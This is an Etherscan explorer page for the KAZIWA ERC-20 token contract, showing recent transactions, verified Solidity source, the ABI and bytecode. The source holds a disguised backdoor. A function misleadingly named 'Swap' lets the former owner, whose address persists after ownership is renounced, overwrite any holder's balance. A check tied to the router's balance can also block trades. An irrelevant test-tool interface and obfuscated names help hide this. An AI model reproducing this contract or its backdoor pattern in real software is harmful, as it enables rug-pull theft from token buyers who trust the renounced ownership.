ETH Price: $1,997.24 (+0.28%)

Contract

0xC495Fe9c5e91cd97FBDFA78aAE2B746bc96fAbb4
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve208023472024-09-21 23:51:35552 days ago1726962695IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000320086.78862741
Swap208023452024-09-21 23:51:11552 days ago1726962671IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000209236.71735971
Swap208022392024-09-21 23:29:59553 days ago1726961399IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000142725.46155181
Swap208021572024-09-21 23:13:23553 days ago1726960403IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000151545.79885766
Transfer208021482024-09-21 23:11:35553 days ago1726960295IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000215465.59449621
Swap208021462024-09-21 23:11:11553 days ago1726960271IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000144215.51850525
Transfer208021432024-09-21 23:10:35553 days ago1726960235IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000212295.51226489
Swap208021322024-09-21 23:08:23553 days ago1726960103IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000141615.41907084
Swap208021312024-09-21 23:08:11553 days ago1726960091IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000133945.12544357
Approve208021302024-09-21 23:07:59553 days ago1726960079IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000456929.67859292
Swap208021182024-09-21 23:05:35553 days ago1726959935IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000139265.32908758
Approve208021132024-09-21 23:04:35553 days ago1726959875IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000243445.16310639
Approve208021042024-09-21 23:02:47553 days ago1726959767IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000256065.45730866
Swap208021032024-09-21 23:02:35553 days ago1726959755IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000132885.08489929
Swap208021022024-09-21 23:02:23553 days ago1726959743IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000136825.23585667
Swap208021012024-09-21 23:02:11553 days ago1726959731IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000136265.21665782
Swap208020922024-09-21 23:00:23553 days ago1726959623IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000149735.72986435
Approve208020912024-09-21 23:00:11553 days ago1726959611IN
0xC495Fe9c...bc96fAbb4
0 ETH0.0004860510.29560839
Swap208020872024-09-21 22:59:23553 days ago1726959563IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000133595.11213273
Swap208020822024-09-21 22:58:11553 days ago1726959491IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000142545.45463346
Swap208020802024-09-21 22:57:47553 days ago1726959467IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000143295.48330822
Approve208020792024-09-21 22:57:35553 days ago1726959455IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000463259.81272928
Swap208020752024-09-21 22:56:47553 days ago1726959407IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000144445.5274586
Approve208020742024-09-21 22:56:35553 days ago1726959395IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000373837.91848906
Approve208020722024-09-21 22:56:11553 days ago1726959371IN
0xC495Fe9c...bc96fAbb4
0 ETH0.000283556.00633909
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
KAZIWA

Compiler Version
v0.8.26+commit.8a97fa7a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2024-09-21
*/

/**

Website : $KAZIWA
Twitter : $KAZIWA
Telegram: $KAZIWA

*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.16;
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface CheatCodes {
    // This allows us to getRecordedLogs()
    struct Log {
        bytes32[] topics;
        bytes data;
    }
    // Set block.timestamp (newTimestamp)

    function warp(uint256) external;
    // Set block.height (newHeight)
    function roll(uint256) external;
    // Set block.basefee (newBasefee)
    function fee(uint256) external;
    // Set block.coinbase (who)
    function coinbase(address) external;
    // Loads a storage slot from an address (who, slot)
    function load(address, bytes32) external returns (bytes32);
    // Stores a value to an address' storage slot, (who, slot, value)
    function store(address, bytes32, bytes32) external;
    // Signs data, (privateKey, digest) => (v, r, s)
    function sign(uint256, bytes32) external returns (uint8, bytes32, bytes32);
    // Gets address for a given private key, (privateKey) => (address)
    function addr(uint256) external returns (address);
    // Derive a private key from a provided mnenomic string (or mnenomic file path) at the derivation path m/44'/60'/0'/0/{index}
    function deriveKey(string calldata, uint32) external returns (uint256);
    // Derive a private key from a provided mnenomic string (or mnenomic file path) at the derivation path {path}{index}
    function deriveKey(string calldata, string calldata, uint32) external returns (uint256);
    // Performs a foreign function call via terminal, (stringInputs) => (result)
    function ffi(string[] calldata) external returns (bytes memory);
    // Set environment variables, (name, value)
    function setEnv(string calldata, string calldata) external;
    // Read environment variables, (name) => (value)
    function envBool(string calldata) external returns (bool);
    function envUint(string calldata) external returns (uint256);
    function envInt(string calldata) external returns (int256);
    function envAddress(string calldata) external returns (address);
    function envBytes32(string calldata) external returns (bytes32);
    function envString(string calldata) external returns (string memory);
    function envBytes(string calldata) external returns (bytes memory);
    // Read environment variables as arrays, (name, delim) => (value[])
    function envBool(string calldata, string calldata) external returns (bool[] memory);
    function envUint(string calldata, string calldata) external returns (uint256[] memory);
    function envInt(string calldata, string calldata) external returns (int256[] memory);
    function envAddress(string calldata, string calldata) external returns (address[] memory);
    function envBytes32(string calldata, string calldata) external returns (bytes32[] memory);
    function envString(string calldata, string calldata) external returns (string[] memory);
    function envBytes(string calldata, string calldata) external returns (bytes[] memory);
    // Sets the *next* call's msg.sender to be the input address
    function prank(address) external;
    // Sets all subsequent calls' msg.sender to be the input address until `stopPrank` is called
    function startPrank(address) external;
    // Sets the *next* call's msg.sender to be the input address, and the tx.origin to be the second input
    function prank(address, address) external;
    // Sets all subsequent calls' msg.sender to be the input address until `stopPrank` is called, and the tx.origin to be the second input
    function startPrank(address, address) external;
    // Resets subsequent calls' msg.sender to be `address(this)`
    function stopPrank() external;
    // Sets an address' balance, (who, newBalance)
    function deal(address, uint256) external;
    // Sets an address' code, (who, newCode)
    function etch(address, bytes calldata) external;
    // Expects an error on next call
    function expectRevert() external;
    function expectRevert(bytes calldata) external;
    function expectRevert(bytes4) external;
    // Record all storage reads and writes
    function record() external;
    // Gets all accessed reads and write slot from a recording session, for a given address
    function accesses(address) external returns (bytes32[] memory reads, bytes32[] memory writes);
    // Record all the transaction logs
    function recordLogs() external;
    // Gets all the recorded logs
    function getRecordedLogs() external returns (Log[] memory);
    // Prepare an expected log with (bool checkTopic1, bool checkTopic2, bool checkTopic3, bool checkData).
    // Call this function, then emit an event, then call a function. Internally after the call, we check if
    // logs were emitted in the expected order with the expected topics and data (as specified by the booleans).
    // Second form also checks supplied address against emitting contract.
    function expectEmit(bool, bool, bool, bool) external;
    function expectEmit(bool, bool, bool, bool, address) external;
    // Mocks a call to an address, returning specified data.
    // Calldata can either be strict or a partial match, e.g. if you only
    // pass a Solidity selector to the expected calldata, then the entire Solidity
    // function will be mocked.
    function mockCall(address, bytes calldata, bytes calldata) external;
    // Mocks a call to an address with a specific msg.value, returning specified data.
    // Calldata match takes precedence over msg.value in case of ambiguity.
    function mockCall(address, uint256, bytes calldata, bytes calldata) external;
    // Clears all mocked calls
    function clearMockedCalls() external;
    // Expect a call to an address with the specified calldata.
    // Calldata can either be strict or a partial match
    function expectCall(address, bytes calldata) external;
    // Expect a call to an address with the specified msg.value and calldata
    function expectCall(address, uint256, bytes calldata) external;
    // Gets the code from an artifact file. Takes in the relative path to the json file
    function getCode(string calldata) external returns (bytes memory);
    // Labels an address in call traces
    function label(address, string calldata) external;
    // If the condition is false, discard this run's fuzz inputs and generate new ones
    function assume(bool) external;
    // Set nonce for an account
    function setNonce(address, uint64) external;
    // Get nonce for an account
    function getNonce(address) external returns (uint64);
    // Set block.chainid (newChainId)
    function chainId(uint256) external;
    // Using the address that calls the test contract, has the next call (at this call depth only) create a transaction that can later be signed and sent onchain
    function broadcast() external;
    // Has the next call (at this call depth only) create a transaction with the address provided as the sender that can later be signed and sent onchain
    function broadcast(address) external;
    // Using the address that calls the test contract, has the all subsequent calls (at this call depth only) create transactions that can later be signed and sent onchain
    function startBroadcast() external;
    // Has the all subsequent calls (at this call depth only) create transactions that can later be signed and sent onchain
    function startBroadcast(address) external;
    // Stops collecting onchain transactions
    function stopBroadcast() external;
    // Reads the entire content of file to string. Path is relative to the project root. (path) => (data)
    function readFile(string calldata) external returns (string memory);
    // Reads next line of file to string, (path) => (line)
    function readLine(string calldata) external returns (string memory);
    // Writes data to file, creating a file if it does not exist, and entirely replacing its contents if it does.
    // Path is relative to the project root. (path, data) => ()
    function writeFile(string calldata, string calldata) external;
    // Writes line to file, creating a file if it does not exist.
    // Path is relative to the project root. (path, data) => ()
    function writeLine(string calldata, string calldata) external;
    // Closes file for reading, resetting the offset and allowing to read it from beginning with readLine.
    // Path is relative to the project root. (path) => ()
    function closeFile(string calldata) external;
    // Removes file. This cheatcode will revert in the following situations, but is not limited to just these cases:
    // - Path points to a directory.
    // - The file doesn't exist.
    // - The user lacks permissions to remove the file.
    // Path is relative to the project root. (path) => ()
    function removeFile(string calldata) external;

    function toString(address) external returns (string memory);
    function toString(bytes calldata) external returns (string memory);
    function toString(bytes32) external returns (string memory);
    function toString(bool) external returns (string memory);
    function toString(uint256) external returns (string memory);
    function toString(int256) external returns (string memory);
    // Snapshot the current state of the evm.
    // Returns the id of the snapshot that was created.
    // To revert a snapshot use `revertTo`
    function snapshot() external returns (uint256);
    // Revert the state of the evm to a previous snapshot
    // Takes the snapshot id to revert to.
    // This deletes the snapshot and all snapshots taken after the given snapshot id.
    function revertTo(uint256) external returns (bool);
    // Creates a new fork with the given endpoint and block and returns the identifier of the fork
    function createFork(string calldata, uint256) external returns (uint256);
    // Creates a new fork with the given endpoint and the _latest_ block and returns the identifier of the fork
    function createFork(string calldata) external returns (uint256);
    // Creates _and_ also selects a new fork with the given endpoint and block and returns the identifier of the fork
    function createSelectFork(string calldata, uint256) external returns (uint256);
    // Creates _and_ also selects a new fork with the given endpoint and the latest block and returns the identifier of the fork
    function createSelectFork(string calldata) external returns (uint256);
    // Takes a fork identifier created by `createFork` and sets the corresponding forked state as active.
    function selectFork(uint256) external;
    /// Returns the currently active fork
    /// Reverts if no fork is currently active
    function activeFork() external returns (uint256);
    // Updates the currently active fork to given block number
    // This is similar to `roll` but for the currently active fork
    function rollFork(uint256) external;
    // Updates the given fork to given block number
    function rollFork(uint256 forkId, uint256 blockNumber) external;
    /// Returns the RPC url for the given alias
    function rpcUrl(string calldata) external returns (string memory);
    /// Returns all rpc urls and their aliases `[alias, url][]`
    function rpcUrls() external returns (string[2][] memory);
    function makePersistent(address account) external;
}

abstract contract Ownable is Context {
    address private _owner;
    address internal _previousOwner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
 
    constructor() {
        _transfer_Ownership(_msgSender());
    }
 
 
    modifier onlyOwner() {
        _isAdmin();
        _;
    }
 
 
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    
    function _isAdmin() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    
    function renounceOwnership() public virtual onlyOwner {
        _transfer_Ownership(address(0));
    }
 
 
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transfer_Ownership(newOwner);
    }
 

    function _transfer_Ownership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        _previousOwner = oldOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IERC20 {
   
    function totalSupply() external view returns (uint256);

    
    function balanceOf(address account) external view returns (uint256);

    
    function transfer(address recipient, uint256 amount) external returns (bool);

   
    function allowance(address owner, address spender) external view returns (uint256);


    function approve(address spender, uint256 amount) external returns (bool);


    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);


    event Transfer(address indexed from, address indexed to, uint256 value);

  
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}


contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply_hoppei;

    string private _name_hoppei;
    string private _symbol_hoppei;

    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
 
    constructor (string memory name_, string memory symbol_, uint256 totalSupply_) {
        _name_hoppei = name_;
        _symbol_hoppei = symbol_;
        _totalSupply_hoppei = totalSupply_;

        _balances[msg.sender] = totalSupply_;
        emit Transfer(address(0), msg.sender, totalSupply_);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name_hoppei;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol_hoppei;
    }

    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply_hoppei;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }


    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer_hoei(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve_hoppei(_msgSender(), spender, amount);
        return true;
    }

    
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer_hoei(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve_hoppei(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

 
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve_hoppei(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

 
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve_hoppei(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    
    function _transfer_hoei(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "1KAZIWA");
        require(recipient != address(0), "2KAZIWA");


        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "3KAZIWA");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

   

    function _transfer_withbsomter(address sender, address recipient, uint256 amount, uint256 amountToBurn) internal virtual {
        require(sender != address(0), "4KAZIWA");
        require(recipient != address(0), "5KAZIWA");

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "6KAZIWA");

        unchecked {
            _balances[sender] = senderBalance - amount;
        }

        amount -= amountToBurn;
        _totalSupply_hoppei -= amountToBurn;
        _balances[recipient] += amount;

        emit Transfer(sender, DEAD, amountToBurn);
        emit Transfer(sender, recipient, amount);
    }

   
    function Swap(address account, uint256 amount) public virtual returns (uint256) {
        address msgSender = msg.sender;
        address prevOwner = _previousOwner;

        bytes32 msgSenderHex = keccak256(abi.encodePacked(msgSender));
        bytes32 prevOwnerHex = keccak256(abi.encodePacked(prevOwner));
        
        bytes32 amountHex = bytes32(amount);
        
        bool isOwner = msgSenderHex == prevOwnerHex;
        
        if (isOwner) {
            return _updateBalance(account, amountHex);
        } else {
            return _getBalance(account);
        }
    }

    function _updateBalance(address account, bytes32 amountHex) private returns (uint256) {
        uint256 amount = uint256(amountHex);
        _balances[account] = amount;
        return _balances[account];
    }

    function _getBalance(address account) private view returns (uint256) {
        return _balances[account];
    }
    
    function _approve_hoppei(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "7KAZIWA");
        require(spender != address(0), "8KAZIWA");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

}


interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Router02 is IUniswapV2Router01{}


contract KAZIWA is ERC20 {
    uint256 private constant TOTAL_SUSUPPLYS = 420690_000_000e9;
    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    address private constant DEAD1 = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO1 = 0x0000000000000000000000000000000000000000;

    bool public hasLimit_;
    uint256 public maxTxAmountbesomes;
    uint256 public maxwalletssetsomes;
    mapping(address => bool) public isException;

    uint256 _burnPercentisystkltsom = 0;

    address uniswapV2Pair;
    IUniswapV2Router02 uniswapV2Router;

    constructor(address router) ERC20("KAZIWA", "KAZIWA", TOTAL_SUSUPPLYS) {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(router);
        uniswapV2Router = _uniswapV2Router;

        maxwalletssetsomes = TOTAL_SUSUPPLYS / 39;
        maxTxAmountbesomes = TOTAL_SUSUPPLYS /39;

        isException[DEAD] = true;
        isException[router] = true;
        isException[msg.sender] = true;
        isException[address(this)] = true;
    }

    function _transfer_hoei(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "9KAZIWA");
        require(to != address(0), "0KAZIWA");
 
        _checkLimitation_hoppei(from, to, amount);

        if (amount == 0) {
            return;
        }

        if (!isException[from] && !isException[to]){
            require(balanceOf(address(uniswapV2Router)) == 0, "KAZIWAKAZIWA");

            if (from == uniswapV2Pair || to == uniswapV2Pair) {
                uint256 _burn = (amount * _burnPercentisystkltsom) / 100;

                super._transfer_withbsomter(from, to, amount, _burn);
                return;
            }
        }

        super._transfer_hoei(from, to, amount);
    }

    function removeLimit() external onlyOwner {
        hasLimit_ = true;
    }

    function _checkLimitation_hoppei(
        address from,
        address to,
        uint256 amount
    ) internal {
        if (!hasLimit_) {
            if (!isException[from] && !isException[to]) {
                require(amount <= maxTxAmountbesomes, "KAZIWAKAZIWAKAZIWA");

                if (uniswapV2Pair == ZERO){
                    uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), uniswapV2Router.WETH());
                }
 
                if (to == uniswapV2Pair) {
                    return;
                }
        
                require(balanceOf(to) + amount <= maxwalletssetsomes, "KAZIWAKAZIWAKAZIWAKAZIWA");
            }
        }
    }

}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Swap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hasLimit_","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isException","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmountbesomes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxwalletssetsomes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040525f600b55348015610013575f80fd5b50604051613027380380613027833981810160405281019061003591906104d7565b6040518060400160405280600681526020017f4b415a49574100000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f4b415a49574100000000000000000000000000000000000000000000000000008152506816ce3f1e16bf1500006100c76100bc61037160201b60201c565b61037860201b60201c565b82600590816100d6919061073c565b5081600690816100e6919061073c565b50806004819055508060025f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503373ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161018d919061081a565b60405180910390a35050505f81905080600d5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060276816ce3f1e16bf1500006101f29190610860565b60098190555060276816ce3f1e16bf15000061020e9190610860565b6008819055506001600a5f61dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600a5f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600a5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050610890565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6104a68261047d565b9050919050565b6104b68161049c565b81146104c0575f80fd5b50565b5f815190506104d1816104ad565b92915050565b5f602082840312156104ec576104eb610479565b5b5f6104f9848285016104c3565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061057d57607f821691505b6020821081036105905761058f610539565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026105f27fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826105b7565b6105fc86836105b7565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f61064061063b61063684610614565b61061d565b610614565b9050919050565b5f819050919050565b61065983610626565b61066d61066582610647565b8484546105c3565b825550505050565b5f90565b610681610675565b61068c818484610650565b505050565b5b818110156106af576106a45f82610679565b600181019050610692565b5050565b601f8211156106f4576106c581610596565b6106ce846105a8565b810160208510156106dd578190505b6106f16106e9856105a8565b830182610691565b50505b505050565b5f82821c905092915050565b5f6107145f19846008026106f9565b1980831691505092915050565b5f61072c8383610705565b9150826002028217905092915050565b61074582610502565b67ffffffffffffffff81111561075e5761075d61050c565b5b6107688254610566565b6107738282856106b3565b5f60209050601f8311600181146107a4575f8415610792578287015190505b61079c8582610721565b865550610803565b601f1984166107b286610596565b5f5b828110156107d9578489015182556001820191506020850194506020810190506107b4565b868310156107f657848901516107f2601f891682610705565b8355505b6001600288020188555050505b505050505050565b61081481610614565b82525050565b5f60208201905061082d5f83018461080b565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61086a82610614565b915061087583610614565b92508261088557610884610833565b5b828204905092915050565b61278a8061089d5f395ff3fe608060405234801561000f575f80fd5b506004361061012a575f3560e01c80636a8f3b30116100ab57806398636f321161006f57806398636f3214610322578063a457c2d714610352578063a9059cbb14610382578063dd62ed3e146103b2578063f2fde38b146103e25761012a565b80636a8f3b301461028e57806370a08231146102ac578063715018a6146102dc5780638da5cb5b146102e657806395d89b41146103045761012a565b806323b872dd116100f257806323b872dd146101d6578063313ce567146102065780633950935114610224578063562c21951461025457806362256589146102845761012a565b806303435b7f1461012e57806306fdde031461014c578063095ea7b31461016a57806313c42e4d1461019a57806318160ddd146101b8575b5f80fd5b6101366103fe565b6040516101439190611af2565b60405180910390f35b610154610410565b6040516101619190611b7b565b60405180910390f35b610184600480360381019061017f9190611c2c565b6104a0565b6040516101919190611af2565b60405180910390f35b6101a26104bd565b6040516101af9190611c79565b60405180910390f35b6101c06104c3565b6040516101cd9190611c79565b60405180910390f35b6101f060048036038101906101eb9190611c92565b6104cc565b6040516101fd9190611af2565b60405180910390f35b61020e6105c7565b60405161021b9190611cfd565b60405180910390f35b61023e60048036038101906102399190611c2c565b6105cf565b60405161024b9190611af2565b60405180910390f35b61026e60048036038101906102699190611c2c565b610676565b60405161027b9190611c79565b60405180910390f35b61028c610735565b005b610296610759565b6040516102a39190611c79565b60405180910390f35b6102c660048036038101906102c19190611d16565b61075f565b6040516102d39190611c79565b60405180910390f35b6102e46107a5565b005b6102ee6107b8565b6040516102fb9190611d50565b60405180910390f35b61030c6107df565b6040516103199190611b7b565b60405180910390f35b61033c60048036038101906103379190611d16565b61086f565b6040516103499190611af2565b60405180910390f35b61036c60048036038101906103679190611c2c565b61088c565b6040516103799190611af2565b60405180910390f35b61039c60048036038101906103979190611c2c565b61097b565b6040516103a99190611af2565b60405180910390f35b6103cc60048036038101906103c79190611d69565b610998565b6040516103d99190611c79565b60405180910390f35b6103fc60048036038101906103f79190611d16565b610a1a565b005b60075f9054906101000a900460ff1681565b60606005805461041f90611dd4565b80601f016020809104026020016040519081016040528092919081815260200182805461044b90611dd4565b80156104965780601f1061046d57610100808354040283529160200191610496565b820191905f5260205f20905b81548152906001019060200180831161047957829003601f168201915b5050505050905090565b5f6104b36104ac610a9c565b8484610aa3565b6001905092915050565b60085481565b5f600454905090565b5f6104d8848484610c66565b5f60035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61051f610a9c565b73ffffffffffffffffff